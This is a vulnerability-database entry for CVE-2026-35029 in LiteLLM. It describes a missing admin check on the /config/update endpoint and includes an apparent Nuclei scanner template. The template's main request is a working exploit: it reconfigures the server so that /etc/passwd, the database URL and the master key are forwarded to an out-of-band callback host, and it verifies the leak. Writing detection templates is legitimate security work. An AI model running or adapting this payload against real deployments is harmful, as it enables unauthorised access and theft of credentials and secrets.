LiteLLM - Arbitrary File Read
CVE-2026-35029
Verified
Description
LiteLLM < 1.83.0 contains a broken access control vulnerability caused by lack of admin role enforcement on /config/update endpoint, letting authenticated users modify configurations, execute code, read files, and take over accounts.
Severity
High
CVSS Score
8.8
Exploit Probability
26%
Affected Product
litellm
Published Date
April 22, 2026
Template Author
theamanrawat
CVE-2026-35029.yaml
id: CVE-2026-35029
info:
name: LiteLLM - Arbitrary File Read
author: theamanrawat
severity: high
description: |
LiteLLM < 1.83.0 contains a broken access control vulnerability caused by lack of admin role enforcement on /config/update endpoint, letting authenticated users modify configurations, execute code, read files, and take over accounts.
impact: |
Authenticated users can execute arbitrary code, read server files, and take over privileged accounts, leading to full system compromise.
remediation: |
Update to version 1.83.0 or later.
reference:
- https://github.com/BerriAI/litellm
- https://sec-consult.com/vulnerability-lab/advisory/broken-access-control-in-config-endpoint-in-litellm/
- https://nvd.nist.gov/vuln/detail/CVE-2026-35029
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2026-35029
epss-score: 0.26409
epss-percentile: 0.97762
cwe-id: CWE-863
metadata:
max-request: 4
verified: true
vendor: berriai
product: litellm
tags: cve,cve2026,litellm,file-read,oob,oidc,oast,vuln,authenticated
http:
- raw:
- |
POST /config/update HTTP/1.1
Host: {{Hostname}}
Authorization: Bearer {{userkey}}
Content-Type: application/json
{"environment_variables":{"FILE_TO_READ":"/etc/passwd","EXFIL_PREFIX":"EXFIL"},"general_settings":{"pass_through_endpoints":[{"path":"/exfil-{{randstr}}","target":"https://{{interactsh-url}}","headers":{"LANGFUSE_PUBLIC_KEY":"os.environ/EXFIL_PREFIX","LANGFUSE_SECRET_KEY":"os.environ/oidc/env_path/FILE_TO_READ","X-DB-URL":"os.environ/DATABASE_URL","X-Master-Key":"os.environ/LITELLM_MASTER_KEY"}}]}}
- |
GET /health/liveliness HTTP/1.1
Host: {{Hostname}}
- |
GET /exfil-{{randstr}} HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
part: interactsh_request
name: content
group: 1
regex:
- "Authorization:\\s*Basic\\s+([A-Za-z0-9+/=]+)"
internal: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'contains(interactsh_protocol, "http")'
- 'regex("EXFIL:root:.*:0:0:", base64_decode(content))'
condition: and
# digest: 490a0046304402206949f63d61b40c26f6f82d0a122e942ad2717bd84c1480cea59ef94ac79c54b302203d5abd03c399faaf95bdb3f37e95757fe1c994fde6cf3ef6ebf1d79529a64962:922c64590222798bb761d5b6d8e729508.8Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVE ID:
cve-2026-35029
CWE ID:
cwe-863
Remediation Steps
Update to version 1.83.0 or later.